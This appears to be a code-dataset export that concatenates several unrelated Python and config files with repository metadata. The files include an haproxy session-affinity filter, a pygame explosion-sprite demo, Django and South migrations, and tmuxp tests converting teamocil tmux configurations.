                # A conversion (or ODT update) by OpenOffice is required.
                if resultType.startswith('.'): resultType = resultType[1:]
                if not resultType in FILE_TYPES.keys():
                    raise PodError(BAD_RESULT_TYPE % (
                        self.result, FILE_TYPES.keys()))
                # Call OpenOffice to perform the conversion or document update
                output = self.callOpenOffice(resultOdtName, resultType)
                # I (should) have the result. Move it to the correct name
                resPrefix = os.path.splitext(resultOdtName)[0] + '.'
                if resultType == 'odt':
                    # converter.py has (normally!) created a second file
                    # suffixed .res.odt
                    resultName = resPrefix + 'res.odt'
                    if not os.path.exists(resultName):
                        resultName = resultOdtName
                        # In this case OO in server mode could not be called to
                        # update indexes, sections, etc.
                else:
                    resultName = resPrefix + resultType
                    if not os.path.exists(resultName):
                        raise PodError(CONVERT_ERROR % output)
                os.rename(resultName, self.result)
        finally:
            # Always remove the temp folder, even when an error occurred.
            FolderDeleter.delete(self.tempFolder)
# ------------------------------------------------------------------------------
| [
"[email protected]"
]
| |
b942645e69d7dd1d7dcbcdb08855353708ff84f2 | 600df3590cce1fe49b9a96e9ca5b5242884a2a70 | /components/autofill/content/common/DEPS | c3505fa54c3ecf8453d1bfdeff494e6ca31545ae | [
"BSD-3-Clause"
]
| permissive | metux/chromium-suckless | efd087ba4f4070a6caac5bfbfb0f7a4e2f3c438a | 72a05af97787001756bae2511b7985e61498c965 | refs/heads/orig | 2022-12-04T23:53:58.681218 | 2017-04-30T10:59:06 | 2017-04-30T23:35:58 | 89,884,931 | 5 | 3 | BSD-3-Clause | 2022-11-23T20:52:53 | 2017-05-01T00:09:08 | null | UTF-8 | Python | false | false | 58 | include_rules = [
"+content/public/common",
"+ipc",
]
| [
"[email protected]"
]
| ||
542816beffb8b703f3ac06dfc3663090ffee2d00 | b129c9b11e9d2c06114f45ce03a94f4f2a177119 | /hugin/haproxy/filters/userstate.py | c25adced17d38446916ca97be7ca2a70eced1dc0 | []
| no_license | pyfidelity/hugin.haproxy | a9e48e345b03ed9d361c0d6c8617135378f5c311 | 444e30350936883e7749c2371f394fa82c1644fe | refs/heads/master | 2016-09-01T17:29:48.210244 | 2014-11-24T12:34:51 | 2014-11-24T12:34:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,529 | py | # Userstate is about detecting when users switch backend node when session affinity is used.
import re
from hugin.haproxy import registerFilter
from collections import deque
COOKIEMATCH = re.compile('.*="?(?P<cookie>\S+)')
class UserState(object):
def __init__(self):
self.duplicates = 0 # Redundant reloads where user press stop or reload
self.redispatch = 0 # Session affinity redispatch
self.affinity = 0 # Session affinity where previous 4 request were to the same instance
self.status = {} # Keep track of last 4 requests for each uid
def process(self, data):
#match = COOKIEMATCH.match(data['reqcookie'])
#if match:
# uid = match.group('cookie')
reqcookie = data.get('reqcookie', None)
if reqcookie is not None and len(reqcookie) > 1:
uid = reqcookie[6:] # __ac="cookieval...
hist = self.status.get(uid, deque(maxlen=4)) # We keep track of the 4 last requests
previous = hist and hist[0]
instance = data['instance']
if previous:
# Detect redundant reloads - C is client abort
if previous['terminationevent'] == 'C' and previous['url'] == data['url']:
self.duplicates += 1
# Check for session affinity
if previous['instance'] == instance:
for item in hist:
if item['instance'] != instance:
break # Different instance, no affinity
self.affinity += 1
# We only check for redispatch or affinity if we have a full history
elif len(hist) == 4:
# Check for redispatch
instances = set([h['instance'] for h in hist])
if len(instances) == 1:
self.redispatch += 1
hist.appendleft(dict(url=data['url'],
terminationevent=data['terminationevent'],
instance=instance,))
self.status[uid] = hist
return data
def stats(self, reset=True, count=20):
duplicates, redispatch, affinity = self.duplicates, self.redispatch, self.affinity
if reset:
self.duplicates = self.redispatch = self.affinity = 0
return dict(duplicates=duplicates,
redispatch=redispatch,
affinity=affinity)
registerFilter('userstate', UserState())
| [
"[email protected]"
]
| |
0535d5b25645641c17f7429e27beadf5cbf303d1 | 1b6fd0e1da9aa6d28b19540887ffcb5233ac3692 | /Resources/RP01/P01.3/sprites_001.py | 8bd0fb678689dd03c92fa1ffe7d2cdabc160fd01 | []
| no_license | rugbyprof/4443-2D-PyGame | a637cd1237f90ca30a484d9fb2b6738571777d8c | bba26f794bd85599cf0598c1c64feec59fa31246 | refs/heads/master | 2022-11-27T14:14:54.982351 | 2020-08-05T19:32:45 | 2020-08-05T19:32:45 | 271,365,653 | 3 | 5 | null | null | null | null | UTF-8 | Python | false | false | 6,735 | py | """
Sprite Helper
Description:
Loading a sprite animation and displaying it.
Problems using a single instance of image.
"""
# Import and initialize the pygame library
import pygame
import random
import json
import pprint
import sys
import os
import math
import glob
from helper_module import rgb_colors
from helper_module import mykwargs
from helper_module import straightDistance
from helper_module import getCardinalDirection
# Import pygame.locals for easier access to key coordinates
# Updated to conform to flake8 and black standards
from pygame.locals import (
K_UP,
K_DOWN,
K_LEFT,
K_RIGHT,
K_ESCAPE,
KEYDOWN,
QUIT,
)
# Keep up with the config stuff. Adding sprite sheets for
# characters and other graphics now
config = {
'title' :'P01.3 Pygame Sprite Movement',
'window_size' : {
'width' : 640,
'height' : 480
},
'sprite_sheets':{
'explosion_01':{'path':'./media/fx/explosion_01'},
'green_monster':{'path':'./media/characters/green_monster'}
},
'background':'./media/backgrounds/tile_1000x1000_40_light.png',
'fps':60
}
colors = rgb_colors('colors.json')
def LoadSpriteImages(path):
    """ Load sprite images into either a dictionary of moves or a list of images
        depending on whether the "sprite" is a multi move character or a single
        effect with just frames to play.

        Reads <path>/moves.json, which must contain 'base_name' and 'ext' plus
        either a 'moves' dict (move name -> list of frame-number strings) or a
        'frames' entry (explicit list of file names, or '*' to glob the folder).

        Returns a dict {move: [image paths]} or a list of image paths.
        Exits the program when the folder or json file is missing/invalid.
    """
    if not os.path.isdir(path):
        print(f"Error: {path} not a valid sprite folder!")
        sys.exit()
    if not os.path.isfile(os.path.join(path, "moves.json")):
        print(f"Error: 'moves.json' is required to be in folder!")
        sys.exit()
    # Read and parse moves.json. The context manager guarantees the file
    # handle is closed (the previous version opened it without closing).
    with open(os.path.join(path, "moves.json"), "r") as f:
        sprite_info = json.load(f)
    # base name and extension are used to build each frame's filename
    base_name = sprite_info['base_name']
    ext = sprite_info['ext']
    # If 'moves' is a key in the dictionary then we create a dictionary of
    # moves where each move points to a list of images for that move.
    if 'moves' in sprite_info:
        moves = {}
        for move, nums in sprite_info['moves'].items():
            moves[move] = [os.path.join(path, base_name + num + ext)
                           for num in nums]
        return moves
    # If 'frames' is in the dictionary, then it is an effect with a list of
    # images. When given '*', glob the folder and sort (glob does not return
    # directory items in order).
    elif 'frames' in sprite_info:
        images = sprite_info['frames']
        if type(images) == list:
            pass
        elif type(images) == str and images == '*':
            images = glob.glob(os.path.join(path, '*' + ext))
            images.sort()
        return images
    else:
        print(f"Error: 'moves' or 'frames' key not in json!!")
        sys.exit()
class Explosion(pygame.sprite.Sprite):
    """One-shot explosion animation sprite.

    Loads its frames from the sprite folder given via the 'fx_sprites'
    keyword argument, and removes itself from all sprite groups
    (self.kill()) once the last frame has been shown.
    """
    def __init__(self, **kwargs):
        # Initiate this sprite
        pygame.sprite.Sprite.__init__(self)
        # get location of sprites for this animation
        fx_sprites = kwargs.get('fx_sprites',None)
        # if not throw error
        if not fx_sprites:
            print("Error: Need location of fx_sprites!")
            sys.exit(0)
        # Screen position of the animation center; defaults to the origin.
        self.center = kwargs.get('loc',(0,0))
        # This function finds the json file and loads all the
        # image names into a list
        self.images = LoadSpriteImages(fx_sprites)
        # container for all the pygame images
        self.frames = []
        # load images and "convert" them. (see link at top for explanation)
        for image in self.images:
            self.frames.append(pygame.image.load(image))
        # animation variables
        self.frame = 0                               # index of current frame
        self.last_update = pygame.time.get_ticks()   # time of last frame change
        self.frame_rate = 0 # smaller = faster
        # prime the animation
        self.image = self.frames[0]
        self.rect = self.image.get_rect()
        self.rect.center = self.center

    def setLocation(self,loc):
        """ Set the center of the explosion
        """
        self.center = loc
        self.rect.center = loc

    def update(self):
        """ Overloaded method from sprite which gets called by the game loop when
            a sprite group gets updated
        """
        now = pygame.time.get_ticks() # get current game clock
        if now - self.last_update > self.frame_rate: #
            self.last_update = now
            self.frame += 1
            if self.frame == len(self.frames):
                # Animation done: leave all groups and reset the frame index
                # so this instance can be reused for the next explosion.
                self.kill()
                self.frame = 0
            else:
                # Advance to the next frame, keeping the sprite centered.
                center = self.rect.center
                self.image = self.frames[self.frame]
                self.rect = self.image.get_rect()
                self.rect.center = center
def main():
    """Entry point: opens the game window and runs the event loop.

    A mouse click moves the single Explosion instance to the click position
    and (re-)adds it to the sprite group so its animation plays there.
    """
    pygame.init()
    # sets the window title
    pygame.display.set_caption(config['title'])
    # Game size of game window from config
    width = config['window_size']['width']
    height = config['window_size']['height']
    # Set up the drawing window
    screen = pygame.display.set_mode((width,height))
    # load our background
    background = pygame.image.load(config['background'])
    # sprite group to handle all the visuals
    all_sprites = pygame.sprite.Group()
    # help control event timing
    clock = pygame.time.Clock()
    # Single Explosion instance reused for every click (see the module
    # docstring: "Problems using a single instance of image").
    e = Explosion(fx_sprites=config['sprite_sheets']['explosion_01']['path'])
    # Run until the user asks to quit
    # game loop
    running = True
    while running:
        clock.tick(config['fps'])
        # fill screen with white
        screen.fill(colors['white'])
        # show background grid (no moving it)
        screen.blit(background, (0,0))
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
            if event.type == pygame.KEYDOWN:
                event.key
            if event.type == pygame.KEYUP:
                event.key
            if event.type == pygame.MOUSEMOTION:
                pass
            if event.type == pygame.MOUSEBUTTONUP:
                print(pygame.mouse.get_pos())
                # Relocate the explosion to the click position and re-add it
                # to the group (it kills itself when its animation ends).
                e.setLocation(pygame.mouse.get_pos())
                all_sprites.add(e)
        all_sprites.update()
        all_sprites.draw(screen)
        pygame.display.flip()
    # Done! Time to quit.
    pygame.quit()
main()
| [
"[email protected]"
]
| |
a90e6404551b5912048b4829a5294fbb441ab70e | 93a95c5b9411960b394cfb63e400910d7d1abf50 | /estoque/migrations/0002_auto_20210510_1515.py | ea13d302de4b62141beacc1712e501fe83515d36 | [
"MIT"
]
| permissive | jonathan-mothe/estoque | 9377e4ac826fabe9d1a4f66f817204334a59a311 | de8d0ea87e67e93ad4922a2d81b1ba7d68a29845 | refs/heads/master | 2023-04-21T19:08:07.579886 | 2021-05-11T17:46:31 | 2021-05-11T17:46:31 | 364,916,799 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,283 | py | # Generated by Django 3.2.2 on 2021-05-10 18:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('estoque', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='EstoqueEntrada',
fields=[
],
options={
'verbose_name': 'estoque estrada',
'verbose_name_plural': 'estoque entrada',
'proxy': True,
'indexes': [],
'constraints': [],
},
bases=('estoque.estoque',),
),
migrations.CreateModel(
name='EstoqueSaida',
fields=[
],
options={
'verbose_name': 'estoque saída',
'verbose_name_plural': 'estoque saída',
'proxy': True,
'indexes': [],
'constraints': [],
},
bases=('estoque.estoque',),
),
migrations.AlterField(
model_name='estoqueitens',
name='estoque',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='estoques', to='estoque.estoque'),
),
]
| [
"[email protected]"
]
| |
8384c25f0bd13dd9db7d550b2dcd676408c0460e | d5cc5b93483f3e13b13cb0580a1994583c70ebb8 | /tmuxp/testsuite/test_config_teamocil.py | 184d205016b1244ea37d8ce4677b4cf7cdbec981 | [
"BSD-3-Clause"
]
| permissive | GoodDingo/tmuxp | b07293e3090760283f7e733fd538410f36f8bea7 | 23594fdae5473aaa31c33dae64ace59001847f9e | refs/heads/master | 2020-12-11T07:38:36.346464 | 2013-12-25T03:29:06 | 2013-12-25T03:29:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,985 | py | # -*- coding: utf-8 -*-
"""Test for tmuxp teamocil configuration..
tmuxp.tests.test_config_teamocil
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: Copyright 2013 Tony Narlock.
:license: BSD, see LICENSE for details
"""
from __future__ import absolute_import, division, print_function, \
with_statement, unicode_literals
import os
import logging
import kaptan
from .. import config, exc
from ..util import tmux
from .helpers import TestCase
logger = logging.getLogger(__name__)
TMUXP_DIR = os.path.join(os.path.dirname(__file__), '.tmuxp')
class TeamocilTest(TestCase):
teamocil_yaml = """\
windows:
- name: "sample-two-panes"
root: "~/Code/sample/www"
layout: even-horizontal
panes:
- cmd: ["pwd", "ls -la"]
- cmd: "rails server --port 3000"
"""
teamocil_dict = {
'windows': [{
'name': 'sample-two-panes',
'root': '~/Code/sample/www',
'layout': 'even-horizontal',
'panes': [
{
'cmd': [
'pwd',
'ls -la'
]
},
{
'cmd': 'rails server --port 3000'
}
]
}]
}
tmuxp_dict = {
'session_name': None,
'windows': [
{
'window_name': 'sample-two-panes',
'layout': 'even-horizontal',
'start_directory': '~/Code/sample/www',
'panes': [
{
'shell_command': [
'pwd',
'ls -la'
]
},
{
'shell_command': 'rails server --port 3000'
}
]
}
]
}
def test_config_to_dict(self):
configparser = kaptan.Kaptan(handler='yaml')
test_config = configparser.import_config(self.teamocil_yaml)
yaml_to_dict = test_config.get()
self.assertDictEqual(yaml_to_dict, self.teamocil_dict)
self.assertDictEqual(
config.import_teamocil(self.teamocil_dict),
self.tmuxp_dict
)
config.validate_schema(
config.import_teamocil(
self.teamocil_dict
)
)
class Teamocil2Test(TestCase):
teamocil_yaml = """\
windows:
- name: "sample-four-panes"
root: "~/Code/sample/www"
layout: tiled
panes:
- cmd: "pwd"
- cmd: "pwd"
- cmd: "pwd"
- cmd: "pwd"
"""
teamocil_dict = {
'windows': [{
'name': 'sample-four-panes',
'root': '~/Code/sample/www',
'layout': 'tiled',
'panes': [
{'cmd': 'pwd'},
{'cmd': 'pwd'},
{'cmd': 'pwd'},
{'cmd': 'pwd'},
]
}]
}
tmuxp_dict = {
'session_name': None,
'windows': [
{
'window_name': 'sample-four-panes',
'layout': 'tiled',
'start_directory': '~/Code/sample/www',
'panes': [
{
'shell_command': 'pwd'
},
{
'shell_command': 'pwd'
},
{
'shell_command': 'pwd'
},
{
'shell_command': 'pwd'
},
]
}
]
}
def test_config_to_dict(self):
configparser = kaptan.Kaptan(handler='yaml')
test_config = configparser.import_config(self.teamocil_yaml)
yaml_to_dict = test_config.get()
self.assertDictEqual(yaml_to_dict, self.teamocil_dict)
self.assertDictEqual(
config.import_teamocil(self.teamocil_dict),
self.tmuxp_dict
)
config.validate_schema(
config.import_teamocil(
self.teamocil_dict
)
)
class Teamocil3Test(TestCase):
teamocil_yaml = """\
windows:
- name: "my-first-window"
root: "~/Projects/foo-www"
layout: even-vertical
filters:
before: "rbenv local 2.0.0-p0"
after: "echo 'I am done initializing this pane.'"
panes:
- cmd: "git status"
- cmd: "bundle exec rails server --port 4000"
focus: true
- cmd:
- "sudo service memcached start"
- "sudo service mongodb start"
"""
teamocil_dict = {
'windows': [{
'name': 'my-first-window',
'root': '~/Projects/foo-www',
'layout': 'even-vertical',
'filters': {
'before': 'rbenv local 2.0.0-p0',
'after': 'echo \'I am done initializing this pane.\''
},
'panes': [
{'cmd': 'git status'},
{'cmd': 'bundle exec rails server --port 4000',
'focus': True},
{'cmd': [
'sudo service memcached start',
'sudo service mongodb start',
]}
]
}]
}
tmuxp_dict = {
'session_name': None,
'windows': [
{
'window_name': 'my-first-window',
'layout': 'even-vertical',
'start_directory': "~/Projects/foo-www",
'shell_command_before': 'rbenv local 2.0.0-p0',
'shell_command_after': (
'echo '
'\'I am done initializing this pane.\''
),
'panes': [
{
'shell_command': 'git status'
},
{
'shell_command': 'bundle exec rails server --port 4000',
'focus': True
},
{
'shell_command': [
'sudo service memcached start',
'sudo service mongodb start'
]
}
]
}
]
}
def test_config_to_dict(self):
self.maxDiff = None
configparser = kaptan.Kaptan(handler='yaml')
test_config = configparser.import_config(self.teamocil_yaml)
yaml_to_dict = test_config.get()
self.assertDictEqual(yaml_to_dict, self.teamocil_dict)
self.assertDictEqual(
config.import_teamocil(self.teamocil_dict),
self.tmuxp_dict
)
config.validate_schema(
config.import_teamocil(
self.teamocil_dict
)
)
class Teamocil4Test(TestCase):
teamocil_yaml = """\
windows:
- name: "erb-example"
root: <%= ENV['MY_PROJECT_ROOT'] %>
panes:
- cmd: "pwd"
"""
teamocil_dict = {
'windows': [{
'name': 'erb-example',
'root': "<%= ENV['MY_PROJECT_ROOT'] %>",
'panes': [
{'cmd': 'pwd'}
]
}]
}
tmuxp_dict = {
'session_name': None,
'windows': [
{
'window_name': 'erb-example',
'start_directory': "<%= ENV['MY_PROJECT_ROOT'] %>",
'panes': [
{
'shell_command': 'pwd'
}
]
}
]
}
def test_config_to_dict(self):
self.maxDiff = None
configparser = kaptan.Kaptan(handler='yaml')
test_config = configparser.import_config(self.teamocil_yaml)
yaml_to_dict = test_config.get()
self.assertDictEqual(yaml_to_dict, self.teamocil_dict)
self.assertDictEqual(
config.import_teamocil(self.teamocil_dict),
self.tmuxp_dict
)
config.validate_schema(
config.import_teamocil(
self.teamocil_dict
)
)
class TeamocilLayoutsTest(TestCase):
"""Import configurations from teamocil's <fixtures/layout.yml>.
https://github.com/remiprev/teamocil/blob/master/spec/fixtures/layouts.yml
LICENSE: https://github.com/remiprev/teamocil/blob/master/LICENSE
"""
teamocil_yaml = """\
# Simple two windows layout
two-windows:
windows:
- name: "foo"
clear: true
root: "/foo"
layout: "tiled"
panes:
- cmd: "echo 'foo'"
- cmd: "echo 'foo again'"
- name: "bar"
root: "/bar"
splits:
- cmd:
- "echo 'bar'"
- "echo 'bar in an array'"
target: bottom-right
- cmd: "echo 'bar again'"
focus: true
width: 50
# Simple two windows layout with filters
two-windows-with-filters:
windows:
- name: "foo"
root: "/foo"
filters:
before:
- "echo first before filter"
- "echo second before filter"
after:
- "echo first after filter"
- "echo second after filter"
panes:
- cmd: "echo 'foo'"
- cmd: "echo 'foo again'"
width: 50
two-windows-with-custom-command-options:
windows:
- name: "foo"
cmd_separator: "\n"
with_env_var: false
clear: true
root: "/foo"
layout: "tiled"
panes:
- cmd: "echo 'foo'"
- cmd: "echo 'foo again'"
- name: "bar"
cmd_separator: " && "
with_env_var: true
root: "/bar"
splits:
- cmd:
- "echo 'bar'"
- "echo 'bar in an array'"
target: bottom-right
- cmd: "echo 'bar again'"
focus: true
width: 50
three-windows-within-a-session:
session:
name: "my awesome session"
windows:
- name: "first window"
panes:
- cmd: "echo 'foo'"
- name: "second window"
panes:
- cmd: "echo 'foo'"
- name: "third window"
panes:
- cmd: "echo 'foo'"
"""
teamocil_dict = {
'two-windows': {
'windows': [
{
'name': 'foo',
'clear': True,
'root': '/foo',
'layout': 'tiled',
'panes': [
{
'cmd': "echo 'foo'"
},
{
'cmd': "echo 'foo again'"
}
]
},
{
'name': 'bar',
'root': '/bar',
'splits': [
{
'cmd': [
"echo 'bar'",
"echo 'bar in an array'"
],
'target': 'bottom-right'
},
{
'cmd': "echo 'bar again'",
'focus': True,
'width': 50
}
]
}
]
},
'two-windows-with-filters': {
'windows': [
{
'name': 'foo',
'root': '/foo',
'filters':
{
'before': [
'echo first before filter',
'echo second before filter'
],
'after': [
'echo first after filter',
'echo second after filter',
]
},
'panes': [
{
'cmd': "echo 'foo'"
},
{
'cmd': "echo 'foo again'",
'width': 50
}
]
}
]
},
'two-windows-with-custom-command-options': {
'windows': [
{
'name': 'foo',
'cmd_separator': ' ',
'with_env_var': False,
'clear': True,
'root': '/foo',
'layout': 'tiled',
'panes': [
{
'cmd': "echo 'foo'"
},
{
'cmd': "echo 'foo again'"
}
]
}, {
'name': 'bar',
'cmd_separator': ' && ',
'with_env_var': True,
'root': '/bar',
'splits': [
{
'cmd': [
"echo 'bar'",
"echo 'bar in an array'"
],
'target': 'bottom-right'
},
{
'cmd': "echo 'bar again'",
'focus': True,
'width': 50
}
]
}]
},
'three-windows-within-a-session': {
'session': {
'name': 'my awesome session',
'windows': [
{
'name': 'first window',
'panes': [
{
'cmd': "echo 'foo'"
}
]
}, {
'name': 'second window',
'panes': [
{
'cmd': "echo 'foo'"}
]
}, {
'name': 'third window',
'panes': [
{
'cmd': "echo 'foo'"
}
]
}
]
}
}
}
two_windows = \
{
'session_name': None,
'windows': [
{
'window_name': 'foo',
'start_directory': '/foo',
'clear': True,
'layout': 'tiled',
'panes': [
{
'shell_command': "echo 'foo'"
},
{
'shell_command': "echo 'foo again'"
}
]
},
{
'window_name': 'bar',
'start_directory': '/bar',
'panes': [
{
'shell_command': [
"echo 'bar'",
"echo 'bar in an array'"
],
'target': 'bottom-right'
},
{
'shell_command': "echo 'bar again'",
'focus': True,
}
]
}
]
}
two_windows_with_filters = \
{
'session_name': None,
'windows': [
{
'window_name': 'foo',
'start_directory': '/foo',
'shell_command_before': [
'echo first before filter',
'echo second before filter',
],
'shell_command_after': [
'echo first after filter',
'echo second after filter',
],
'panes': [
{
'shell_command': "echo 'foo'"
},
{
'shell_command': "echo 'foo again'",
}
]
}
]
}
two_windows_with_custom_command_options = \
{
'session_name': None,
'windows': [
{
'window_name': 'foo',
'start_directory': '/foo',
'clear': True,
'layout': 'tiled',
'panes': [
{
'shell_command': "echo 'foo'",
},
{
'shell_command': "echo 'foo again'",
}
]
},
{
'window_name': 'bar',
'start_directory': '/bar',
'panes': [
{
'shell_command': [
"echo 'bar'",
"echo 'bar in an array'"
],
'target': 'bottom-right'
},
{
'shell_command': "echo 'bar again'",
'focus': True,
}
]
}
]
}
three_windows_within_a_session = {
'session_name': 'my awesome session',
'windows': [
{
'window_name': 'first window',
'panes': [
{
'shell_command': "echo 'foo'"
},
]
},
{
'window_name': 'second window',
'panes': [
{
'shell_command': "echo 'foo'"
},
]
},
{
'window_name': 'third window',
'panes': [
{
'shell_command': "echo 'foo'"
},
]
},
]
}
def test_config_to_dict(self):
self.maxDiff = None
configparser = kaptan.Kaptan(handler='yaml')
test_config = configparser.import_config(self.teamocil_yaml)
yaml_to_dict = test_config.get()
self.assertDictEqual(yaml_to_dict, self.teamocil_dict)
self.assertDictEqual(
config.import_teamocil(
self.teamocil_dict['two-windows'],
),
self.two_windows
)
config.validate_schema(
config.import_teamocil(
self.teamocil_dict['two-windows']
)
)
self.assertDictEqual(
config.import_teamocil(
self.teamocil_dict['two-windows-with-filters'],
),
self.two_windows_with_filters
)
config.validate_schema(
config.import_teamocil(
self.teamocil_dict['two-windows-with-filters']
)
)
self.assertDictEqual(
config.import_teamocil(
self.teamocil_dict['two-windows-with-custom-command-options'],
),
self.two_windows_with_custom_command_options
)
config.validate_schema(
config.import_teamocil(
self.teamocil_dict['two-windows-with-custom-command-options']
)
)
self.assertDictEqual(
config.import_teamocil(
self.teamocil_dict['three-windows-within-a-session'],
),
self.three_windows_within_a_session
)
config.validate_schema(
config.import_teamocil(
self.teamocil_dict['three-windows-within-a-session']
)
)
""" this configuration contains multiple sessions in a single file.
tmuxp can split them into files, proceed?
"""
| [
"[email protected]"
]
| |
1fd9d339fb8682ef8a6f21a25cc9fe2d23ae8ca3 | 09bcd2a342fc79a4a7c30e24a76788d90df2176d | /galleria/artists/migrations/0001_initial.py | f3a25b6873d47bb0d9d6a0437de97740b0176461 | [
"Apache-2.0"
]
| permissive | kamalhg/galleria | 48b2ed5ef1931ee12b7247caf7e50caa167c88ff | 18ee38e99869812e61244d62652514d1c46bf3f3 | refs/heads/master | 2020-12-27T12:15:22.233386 | 2014-06-18T15:53:54 | 2014-06-18T15:53:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,628 | py | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration: creates/drops the ``artists_artist`` table.

    Auto-generated by South; the ``models`` attribute below is the frozen ORM
    snapshot taken when the migration was created.
    """

    def forwards(self, orm):
        """Apply the migration: create the table backing the Artist model."""
        # Adding model 'Artist'
        db.create_table('artists_artist', (
            ('created', self.gf('model_utils.fields.AutoCreatedField')(default=datetime.datetime.now)),
            ('modified', self.gf('model_utils.fields.AutoLastModifiedField')(default=datetime.datetime.now)),
            ('contact', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['contacts.Contact'], primary_key=True, unique=True)),
            ('gallery_id', self.gf('django.db.models.fields.IntegerField')()),
            ('biography', self.gf('django.db.models.fields.TextField')()),
            ('price', self.gf('django.db.models.fields.TextField')()),
            ('info', self.gf('django.db.models.fields.TextField')()),
            ('commission', self.gf('django.db.models.fields.DecimalField')(decimal_places=3, max_digits=4)),
        ))
        db.send_create_signal('artists', ['Artist'])

    def backwards(self, orm):
        """Reverse the migration: drop the Artist model's table."""
        # Deleting model 'Artist'
        db.delete_table('artists_artist')

    # Frozen ORM model definitions (generated by South at migration time).
    models = {
        'artists.artist': {
            'Meta': {'object_name': 'Artist'},
            'biography': ('django.db.models.fields.TextField', [], {}),
            'commission': ('django.db.models.fields.DecimalField', [], {'decimal_places': '3', 'max_digits': '4'}),
            'contact': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['contacts.Contact']", 'primary_key': 'True', 'unique': 'True'}),
            'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
            'gallery_id': ('django.db.models.fields.IntegerField', [], {}),
            'info': ('django.db.models.fields.TextField', [], {}),
            'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
            'price': ('django.db.models.fields.TextField', [], {})
        },
        'categories.category': {
            'Meta': {'object_name': 'Category'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '40'})
        },
        'contacts.address': {
            'Meta': {'object_name': 'Address'},
            'city': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contacts.Contact']"}),
            'country': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'county': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'postcode': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'street': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'type': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'contacts.contact': {
            'Meta': {'object_name': 'Contact'},
            'addressed_as': ('django.db.models.fields.CharField', [], {'default': "'calculated'", 'max_length': '100'}),
            'addressed_as_custom': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
            'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'null': 'True', 'blank': 'True', 'to': "orm['categories.Category']"}),
            'company': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
            'company_or_individual': ('django.db.models.fields.CharField', [], {'default': "'individual'", 'max_length': '10'}),
            'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
            'department': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'job_title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
            'main_address': ('django.db.models.fields.related.ForeignKey', [], {'null': 'True', 'to': "orm['contacts.Address']", 'blank': 'True', 'related_name': "'main_address'"}),
            'main_phonenumber': ('django.db.models.fields.related.ForeignKey', [], {'null': 'True', 'to': "orm['contacts.PhoneNumber']", 'blank': 'True', 'related_name': "'main_phonenumber'"}),
            'migration_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
            'name_first': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
            'name_last': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
            'name_middle': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
            'reference': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
            'suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
            'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contacts.ContactType']"})
        },
        'contacts.contacttype': {
            'Meta': {'object_name': 'ContactType'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '30'})
        },
        'contacts.phonenumber': {
            'Meta': {'object_name': 'PhoneNumber'},
            'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contacts.Contact']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'number': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
            'type': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        }
    }

    complete_apps = ['artists']
| [
"[email protected]"
]
| |
a0d0b8457024d2982d5052c463bd38f342cf93d4 | e18f0a32703fbe841d27c8a0e55eca9b9ab39cce | /run.py | c3e6569870cc01a9823fac62025ce182b58ea349 | [
"Apache-2.0"
]
